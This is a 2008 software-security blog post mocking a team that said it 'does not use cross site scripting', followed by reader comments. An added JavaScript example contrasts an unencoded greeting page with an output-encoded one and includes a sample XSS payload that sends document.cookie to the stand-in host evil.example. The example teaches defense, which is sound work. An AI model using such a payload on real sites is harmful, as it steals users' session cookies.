From the Office of "Real World Software Security"
When a customer development team was recently asked to use the AntiXSS library, validate input and encode output for their web interface, they replied (and I quote) “we do not use cross site scripting”.
If any customer ever asks what the single most effective thing is to effect a positive change in their software security program, I always respond: education and awareness. Pound for pound, dollar for dollar, it is the most effective tool anyone has.
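The reply misses who supplies the script: the application never "uses" cross site scripting, an attacker does, and the script becomes code only because the page copies attacker-controlled input into HTML unencoded. The following is an added example (not from the original post and not the AntiXSS library's code) of the advice given above: a hypothetical greeting page, first vulnerable, then with output encoding at the point of insertion, plus an allow-list validator for a field with a known shape. The request value, the `greetUnsafe`/`greetSafe` function names and the `evil.example` host are all constructed for illustration.

```javascript
// Added example, not code from the original post or from the AntiXSS library.
// Demonstrates "validate input and encode output" on a page that greets the
// visitor by a query parameter, which is where attacker-supplied markup arrives.

// Encoder for the HTML body context (text between tags). A library such as
// AntiXSS ships per-context encoders; this hand-rolled stand-in covers the five
// characters that can change meaning in that context.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Encoder for an HTML attribute value. Everything outside [A-Za-z0-9] becomes a
// numeric entity, so the value cannot terminate the attribute whether or not
// the developer remembered to quote it.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// The customer's page as described: user input interpolated straight into HTML.
function greetUnsafe(name) {
  return `<p>Hello, ${name}!</p>`;
}

// Same page with encoding applied where the untrusted value enters the HTML.
function greetSafe(name) {
  return `<p>Hello, ${encodeForHtml(name)}!</p>`;
}

// Input validation complements encoding when the field has a known shape
// (here, a username). It does not replace encoding for free-text fields.
function isValidUsername(name) {
  return /^[A-Za-z0-9_]{1,32}$/.test(name);
}

// Crude stand-in for a browser's parser: does the markup contain a raw script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample value, as it would arrive in ?name=... from an attacker.
const attackerName =
  '<script>document.location="http://evil.example/?c="+document.cookie</script>';

function demo() {
  const results = {
    unsafeExecutes: containsScriptTag(greetUnsafe(attackerName)), // true
    safeExecutes: containsScriptTag(greetSafe(attackerName)),     // false
    rejectedByValidator: !isValidUsername(attackerName),          // true
  };
  console.log(greetUnsafe(attackerName));
  console.log(greetSafe(attackerName));
  console.log(results);
  return results;
}

demo();
```

The point the example makes for the customer: neither page "uses" scripting, yet only the encoded one is safe, because the browser cannot distinguish markup the developer wrote from markup an attacker supplied unless the application encodes at output.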
January 10, 2008 at 5:55 pm
Wow… just… wow.
“You should use a safe at your bank to secure your money from thieves”
“oh, we don’t steal money so we don’t need a safe”
January 10, 2008 at 6:08 pm
Later that day…
“Bill did you install the anti-virus software?”
“No need Fred, we do not use viruses.”
January 10, 2008 at 7:19 pm
That is great stuff! I have heard some pretty crazy things while talking to folks about software security, running training classes and such. That is a keeper.
I was hoping that the industry was finally getting to the point where most software developers knew about SQL injection and Cross Site Scripting so that we could finally move on to more interesting problems, but I guess that is not the case.
Until basic software security education gets pushed down to the University level, though, I don’t suppose we should expect to see that kind of sea change. Oh - and “How to Program” books probably need to stop using examples with security issues…
–Dan
January 10, 2008 at 9:34 pm
no – don’t put secure coding in the “how to program” books… you can make more money by selling “Now that you can program, program with security” and sell 2 books instead of 1.
January 11, 2008 at 10:49 pm
What scares me is how often this person (and others!) respond with such statements to more than just the question you asked. They might be the type that deny everything to do with insecurity. “We don’t use SQL servers.” “We don’t have vulnerable web servers.” “We don’t use dynamic websites.”
January 12, 2008 at 5:14 am
Cross-Site Scripting, as a term, is unnecessarily complex. It’s HTML Injection. Call it that, and a web developer will know what it is, how it happens, and how to prevent it.
January 12, 2008 at 8:51 am
I am just a native Englishman. Grammar fixed guvnor.
January 12, 2008 at 9:09 pm
@ Alun Jones:
Well, not really. Stored-XSS and HTML Injection are the same thing. Reflected-XSS is more like a few things, some of which include: parameter/form-based/cookie tampering in the HTTP header to include a script that will execute code on the client-side, while no code is executed or injected on the server-side. Reflected-XSS also includes script code inside binaries or in other places (e.g. Flash/QuickTime/media files, or images, or cache files) besides just HTTP header injections. DOM-based XSS is XSS on the client-side DOM (Javascript injected Javascript)!
I do think we’re going to need to start redefining XSS. Many XSS tools today only look for Javascript. But there are also other languages, including VBScript, Applescript, Actionscript, Silverlight (and other RIA frameworks) — and most evil of all — HTML, XHTML, CSS, XML, etc.
January 13, 2008 at 9:02 am
[...] what led me to write this post is the entry From the Office of “Real World Software Security”, in which, after recommending that a customer use an antiXSS library, the customer [...]
January 15, 2008 at 1:07 pm
[...] From the Office of “Real World Software Security” [...]
January 16, 2008 at 12:48 am
Is this the same as no accountability? Don’t fix it till we get in trouble?
Sad.
January 19, 2008 at 6:45 am
[...] nearly as much as it should. With all the other "low hanging fruit", and with examples of cluelessness like this, we’ll probably see more stories of domain/email/bank accounts/stock trades being [...]
February 22, 2008 at 11:17 am
[...] Wednesday Mark Curphey emailed me about a conversation his team had with a customer. I see he has now blogged about the conversation. Here’s an excerpt. When a customers [sic, you need to learn some [...]
March 2, 2008 at 5:37 pm
[...] from Mark Curphey’s post: “When a customer development team was recently asked to use the AntiXSS library, validate [...]